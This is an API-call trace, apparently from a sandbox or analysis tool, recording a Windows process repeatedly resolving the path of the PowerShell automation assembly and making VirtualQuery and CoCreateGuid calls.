	[0321.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.556] VirtualQuery (in: lpAddress=0x1cb4e0, lpBuffer=0x1cc3a0, dwLength=0x30 | out: lpBuffer=0x1cc3a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.557] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.558] VirtualQuery (in: lpAddress=0x1cb790, lpBuffer=0x1cc650, dwLength=0x30 | out: lpBuffer=0x1cc650*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.559] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x5e3bcc9e, Data2=0xdc37, Data3=0x4dc7, Data4=([0]=0xa5, [1]=0xf3, [2]=0x51, [3]=0x80, [4]=0x2d, [5]=0x29, [6]=0x67, [7]=0x74))) returned 0x0
	[0321.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.561] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x88609f6b, Data2=0x40de, Data3=0x4689, Data4=([0]=0x81, [1]=0x7b, [2]=0x9b, [3]=0x2e, [4]=0x2f, [5]=0xdf, [6]=0xa, [7]=0xaf))) returned 0x0
	[0321.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.562] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1eb5380d, Data2=0xebed, Data3=0x47e8, Data4=([0]=0x92, [1]=0x77, [2]=0x94, [3]=0xa5, [4]=0x29, [5]=0x98, [6]=0xd1, [7]=0x13))) returned 0x0
	[0321.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.563] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x9bb5f9bf, Data2=0xc923, Data3=0x4a4a, Data4=([0]=0xa3, [1]=0xae, [2]=0xa2, [3]=0x0, [4]=0x80, [5]=0x43, [6]=0x23, [7]=0xc3))) returned 0x0
	[0321.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.564] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x597ebb69, Data2=0x7d49, Data3=0x4643, Data4=([0]=0x84, [1]=0x51, [2]=0xbe, [3]=0x49, [4]=0xa3, [5]=0xf5, [6]=0x78, [7]=0x5c))) returned 0x0
	[0321.564] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc3bb3ef0, Data2=0x778e, Data3=0x4210, Data4=([0]=0xa9, [1]=0xd3, [2]=0x36, [3]=0x27, [4]=0x75, [5]=0xb6, [6]=0x52, [7]=0xc9))) returned 0x0
	[0321.565] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x935a467, Data2=0xdd9a, Data3=0x4472, Data4=([0]=0x98, [1]=0x4d, [2]=0xf7, [3]=0xc3, [4]=0xea, [5]=0xc8, [6]=0x6d, [7]=0xbc))) returned 0x0
	[0321.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
